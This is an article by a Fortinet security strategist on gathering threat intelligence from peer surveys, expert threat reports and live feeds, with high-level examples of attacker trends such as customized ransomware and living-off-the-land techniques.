By Anthony Giandomenico
Senior Security Strategist, Fortinet
As organizations continue to adopt and drive digital transformation (DX), staying ahead of the threat landscape and attack chain curves is becoming increasingly difficult to achieve. Today, rather than having a single network to secure, most organizations now own and manage a variety of environments, including physical networks, private cloud and virtual SDN environments, multiple public clouds, an expanding WAN edge, IT/OT convergence, and an increasingly mobile workforce.
This also includes things like ongoing DevOps application development, containerized environments, and the adoption of IaaS and SaaS solutions—including Shadow IT. And given the advent of more deeply integrated solutions, such as smart cars, companies, and cities, and the looming launch of 5G and the myriad of new immersive applications and rich media sources that will result from that, the impact of DX seems to stretch out over the horizon.
Gathering and Maintaining Critical Threat Intelligence
Given the rate of change, where do you get access to reliable and actionable threat intelligence, especially when we seem overrun by a slew of quarterly, semi-annual, and annual threat reports, along with commissioned “studies” coming from every possible angle and vendor?
There are generally three kinds of threat intelligence.
Peer-based Threat Intelligence: The first, and most common, is based on a survey of security leaders or similar individuals that asks about the sorts of threats they have been experiencing. This sort of intelligence can be especially valuable if those people being interviewed operate within your same industry or live in your same geographical region. However, an even more effective way to gather this sort of intelligence, however, is to subscribe to a threat rating service. These services, if provided by an organization with a global threat research footprint, can provide real-time insights into the state of security and security challenges being experienced by your peers.
Expert-led Threat Reports: Threat intelligence not only needs to provide an historical review of the threat landscape, but also predict potential evolutionary points for malware and cybercriminal strategies in order to establish and maintain proper defenses in a rapidly evolving threat landscape. If you are feeling overwhelmed with the amount of information being produced, start with threat reports produced by professional threat research teams. Here are a few examples of the kind of intelligence gathered by professional research teams that can be used to predict future attack strategies from the recent Fortinet Global Threat Landscape Report:
Attack models are increasingly incestuous: The degree to which different threats share infrastructure shows some valuable trends. Some threats leverage community-use infrastructure to a greater degree than unique or dedicated infrastructure. Nearly 60% of threats shared at least one domain indicating the majority of botnets leverage established infrastructure.
Attacks are becoming more customized: Threat developers are also increasingly writing highly modular tools designed for specific attacks—such as proxy for large scale network penetration. Likewise, custom ransomware is now being targeted at specific accounts that give the attacker privileged access to the network. LockerGoga developers, for example, had so thoroughly researched their target’s defenses that they were able to determine their malware would not be detected, so they didn’t even bother to develop a way to hide it from discovery. As a result, defenses need to be raised to protect data that can be leveraged to make an attack more effective, and critical accounts with privilege need to be prioritized.
Cybercriminals are Targeting New Technologies: Adversaries tend to move from one opportunity to the next in clusters, targeting successfully exploited vulnerabilities and technologies that are on the upswing, to quickly maximize opportunity. An example of new technologies getting a lot of attention from cybercriminals recently are Web platforms that make it easier for consumers and businesses to build Web presences. They continue to be targeted, even associated third party plugins.
Growing Sophistication of Existing Malware: Cybercriminals are also targeting pre-installed tools (such as PowerShell) to not only make it more difficult to detect them, but to also enable them to spread more stealthily and wreak more havoc. The Silence Group, for example, uses publicly available tools and utilities, combined with sophisticated “Living off the Land” (LoTL) strategies, to avoid detection. Securing tools that enable LoTL strategies needs to be a priority for security teams.
The takeaway here is that missed or overlooked trends like these play a critical role in enabling researchers to not only respond to these threats, but also predict ongoing threat behavior into the future. That sort of information, in turn, enables security administrators to take proactive rather than reactive steps in protecting their networks.
Threat Feeds and Internally Gathered Intelligence: In addition to these intelligence sources, security leaders need to subscribe to live threat feeds that provide robust and actionable information, as well as services that provide real-time updates and recommendations from the cybersecurity front lines. Often, these resources are produced by the same organization that produces quarterly or annual reports—which provides another clue as to which reports are likely to be the most valuable.
Threat feed and threat report intelligence needs to be combined with local data gathered from tools like sandboxes and SIEMS, and correlated through a common management, policy, and orchestration solution to see if and how your organization has been exposed so proper countermeasures and preparations can be made.
Conclusion
Improving your organization’s ability to not only properly defend itself against current threat trends, but also predict a broad number of future attacks require threat intelligence that enables organizations to be proactive. This ability to “see the future” of threat trends allows organizations to not only more effectively defend against current attacks, but prevent the next wave of attacks before they occur.